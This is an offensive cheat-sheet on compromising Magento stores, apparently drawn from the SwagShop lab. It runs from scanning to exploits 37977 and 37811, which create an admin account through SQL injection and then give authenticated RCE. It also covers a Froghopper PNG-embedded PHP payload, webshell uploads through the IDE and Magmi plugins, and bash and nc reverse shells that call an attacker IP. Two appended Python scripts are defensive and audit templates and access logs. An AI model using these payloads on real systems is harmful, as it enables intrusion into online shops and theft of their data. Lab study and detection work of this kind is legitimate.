# Magento

## Magento CMS

* <https://magento.com>
* Magento is an open-source e-commerce platform written in PHP
* <https://magento.com/blog/magento-news/magento-community-edition-1.9.1-now-available-download>
* <https://docs.magento.com/m1/ce/user_guide/configuration/url-admin-custom.html>

## Scan

* Magescan
* <https://github.com/steverobbins/magescan>
* Finds version, files, etc. (app/etc/local.xml may contain passwords)
* Find the Admin page: <http://10.x.x.x/index.php/admin>

```
> php magescan.phar scan:all 10.x.x.x
```

## Create Admin

* RCE 37977
* Magento eCommerce- Remote code Execution-37977.py
* Creates admin credentials through a SQL injection

```
searchsploit magento
Magento eCommerce- Remote code Execution-37977.py
vi 37977.py
target = "http://10.x.x.x/"
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

python 37977.py
http://swagshop.htb/index.php/admin/
Gives us admin credentials!
forme:forme
```

## Authenticated RCE 37811

* Must have Admin User/Pass for this to work
* Must have install\_date from '/app/etc/local.xml'
* Lots of tweaks and errors to get this to work
* <https://joshuasuren.medium.com/hack-the-box-swagshop-write-up-18-1c18fecf885a>

```
-------------------
Authenticated RCE: 37811.py
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution

vi 37811.py
username='forme'
password='forme'
install_date='Wed, 08 May 2019...'      ..from local.xml

-------------------
Errors:
ippsec used the path to the admin page:
python exec.py http://10.x.x.x/index.php/admin/ 'whoami'

-------------------
Other bloggers updated the login-form handling:
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwdone = br.find_control(name="login[password]", nr=0)
pwdone.value = password

-------------------
More errors; had to change the orders period from 7d to 2y:
request = br.open(url + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)
                                                 /\
-------------------
python 37811.py http://$IP "whoami"                     ..error
python 37811.py http://$IP/index.php/admin/ "whoami"    ..better
python 37811.py http://$IP/index.php/admin/ "bash -c 'bash -i >& /dev/tcp/10.x.x.x/9001 0>&1'"

nc -nvlp 9001          ..listener port must match the payload
whoami
www-data
```

## Upload IDE

* Requires Admin login
* System > Magento Connect > Magento Connection Manager > **Upload**
* Download: [Magpleasure\_Filesystem-1.0.0.tgz](http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz)

```
---------------
http://$IP/index.php/admin/
Login with Admin

System > Magento Connect > Magento Connection Manager

Check box: Put store on the maintenance mode while installing
Direct Package File Upload > Browse
Magpleasure_Filesystem-1.0.0.tgz
Upload!
Download:
http://connect20.magentocommerce.com/community/Magpleasure_Filesystem/1.0.0/Magpleasure_Filesystem-1.0.0.tgz

---------------
System > Filesystem > IDE
Edit "cron.php"
Replace its contents with a PHP webshell

Get your shell
http://10.x.x.x/cron.php

Submit a Python reverse shell through the webshell
nc -nvlp 4444
whoami
www-data
```

## Froghopper Attack (RCE)

* Requires Admin login
* <https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper>
* Upload an evil PNG that actually contains PHP code (shell.php.png)
* Enable Symlinks
* Edit Newsletter to call the payload

```
http://swagshop.htb/index.php/admin/ 
Login with Admin

-------------------
Create evil png

echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

-------------------
System > Configuration > Advanced > Developer > Template Settings
Allow Symlinks: "Yes"

-------------------
Catalog > Manage Categories > New Category
Thumbnail Image: Browse "shell.php.png"
http://10.x.x.x/media/catalog/category/shell.php.png   ..confirm it worked!

-------------------
Newsletter > Edit Newsletter Template
Add our code block to the "Template Content"
Save Template
Preview Template (to execute)
{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

-------------------
Previewing the template follows the traversal path (allowed because symlinks are enabled) and executes the PHP inside the PNG

nc -nvlp 4444
whoami
www-data
```
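As an added defensive check, not part of the original notes, the following Python audits newsletter/CMS template bodies for the `{{block type='core/template' ...}}` directive the Froghopper chain relies on and flags template paths that traverse, are absolute, point into media, or are not `.phtml` files; the regexes, function names and sample strings are assumptions of this example, and it also accepts the curly quotes that copy-pasted payloads often carry.

```python
import re

# {{block ...}} directive; the attribute regex accepts straight and curly
# quotes because copy-pasted payloads (as on this page) often carry the latter.
BLOCK_RE = re.compile(r"\{\{block\s+([^}]*)\}\}", re.IGNORECASE)
QUOTE = "\"'\u2018\u2019\u201c\u201d"
ATTR_RE = re.compile(r"(\w+)\s*=\s*[" + QUOTE + r"]([^" + QUOTE + r"]*)[" + QUOTE + "]")

def parse_block_directives(content):
    """Return one {attribute: value} dict per {{block ...}} found in content."""
    return [dict(ATTR_RE.findall(m.group(1))) for m in BLOCK_RE.finditer(content)]

def suspicious_template_path(path):
    """Reasons a core/template path looks like Froghopper-style abuse (empty if clean)."""
    reasons = []
    parts = path.replace("\\", "/").split("/")
    if ".." in parts:
        reasons.append("path traversal")
    if path.startswith(("/", "\\")):
        reasons.append("absolute path")
    if not path.lower().endswith(".phtml"):
        reasons.append("non-.phtml template")
    if "media" in parts:
        reasons.append("points into the media (upload) directory")
    return reasons

def audit_template(content, allow_symlink=False):
    """Findings for one template body; allow_symlink mirrors the Allow Symlinks setting."""
    findings = []
    for attrs in parse_block_directives(content):
        tmpl = attrs.get("template")
        if attrs.get("type") != "core/template" or tmpl is None:
            continue
        reasons = suspicious_template_path(tmpl)
        if reasons:
            if allow_symlink:
                reasons.append("Allow Symlinks is Yes, so the path will be followed")
            findings.append({"template": tmpl, "reasons": reasons})
    return findings

# Constructed samples: the directive from the Froghopper steps above, and a benign footer include.
SAMPLE_MALICIOUS = "{{block type=’core/template’ template=’../../../../../../media/catalog/category/shell.php.png’}}"
SAMPLE_BENIGN = "Hi {{var customer.name}} {{block type='core/template' template='newsletter/footer.phtml'}}"

if __name__ == "__main__":
    for finding in audit_template(SAMPLE_MALICIOUS, allow_symlink=True):
        print(finding)
```

Run it over exported newsletter and CMS templates; any finding, combined with Allow Symlinks set to Yes, is the stored half of this attack.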

## Upload Evil Plugin

* Requires Admin login
* Magento (here Magmi) plugins are basically PHP files, zipped
* Zip an evil [PHP](/04-webapps/php-tricks.md) file and upload it as a plugin
* Did not work on SwagShop (HTB)

```
http://$IP/magmi/web/magmi.php
http://$IP/index.php/admin/Cms_Wysiwyg/directive/index/
http://$IP/index.php/admin/Cms_Wysiwyg/directive/key/905d7.../

-------------------
vi evil.php

<?php
if (isset($_POST['command'])) {
    echo "<form action='evil.php' method='post'>
          <input type='text' name='command' value=''/>
          <input type='submit' value='execute'/>
          </form>";

    if (function_exists('shell_exec')) {
        $command = $_POST['command'];
        $output = shell_exec("$command");
        echo "<pre>$output</pre>";
    }
} else {
    echo "<form action='evil.php' method='post'>
          <input type='text' name='command' value=''/>
          <input type='submit' value='execute'/>
          </form>";
}
?>

-------------------
> zip evil.zip evil.php

Upload new plugins:
click on "choose file" > evil.zip
 
-------------------
Execute:
http://10.x.x.x/magmi/plugins/evil.php
```
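Added detection example, not from the original notes: it parses web-server access-log lines (combined format, constructed samples) and flags the request paths used in the Create Admin section (the 37977 `Cms_Wysiwyg/directive` endpoint), the Froghopper section (a `.php.png` under `/media`), and this section (anything under `/magmi/`), plus fetches of `local.xml`; rule names, regexes and the sample lines are assumptions of this example.

```python
import re

# Apache/nginx "combined" access-log line (the constructed samples below use it).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Request-path indicators taken from the techniques in the sections above.
RULES = [
    ("cms_wysiwyg_directive", re.compile(r"/admin/Cms_Wysiwyg/directive/", re.I)),  # 37977 SQLi endpoint
    ("magmi_exposed", re.compile(r"/magmi/", re.I)),                                # Magmi UI / plugin dir reachable
    ("double_ext_in_media", re.compile(r"/media/.*\.php\.(png|jpe?g|gif)$", re.I)),  # shell.php.png-style file fetched
    ("local_xml_fetch", re.compile(r"/app/etc/local\.xml$", re.I)),                # install_date / DB credentials file
]

def parse_line(line):
    """Dict of log fields, or None if the line is not combined-format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def scan_log(lines):
    """Return [(rule, ip, path, status)] for every line hitting an indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rx in RULES:
            if rx.search(rec["path"]):
                hits.append((name, rec["ip"], rec["path"], rec["status"]))
    return hits

# Constructed sample log; 203.0.113.5 walks the chain described on this page.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/May/2019:10:00:01 +0000] "POST /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [08/May/2019:10:00:09 +0000] "GET /media/catalog/category/shell.php.png HTTP/1.1" 200 87',
    '203.0.113.5 - - [08/May/2019:10:00:12 +0000] "GET /magmi/web/magmi.php HTTP/1.1" 401 0',
    '198.51.100.7 - - [08/May/2019:10:01:00 +0000] "GET /index.php/customer/account/login/ HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 on the directive endpoint from an unauthenticated source, or any 200 on a double-extension file under `/media`, is worth treating as confirmed compromise rather than a scan.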
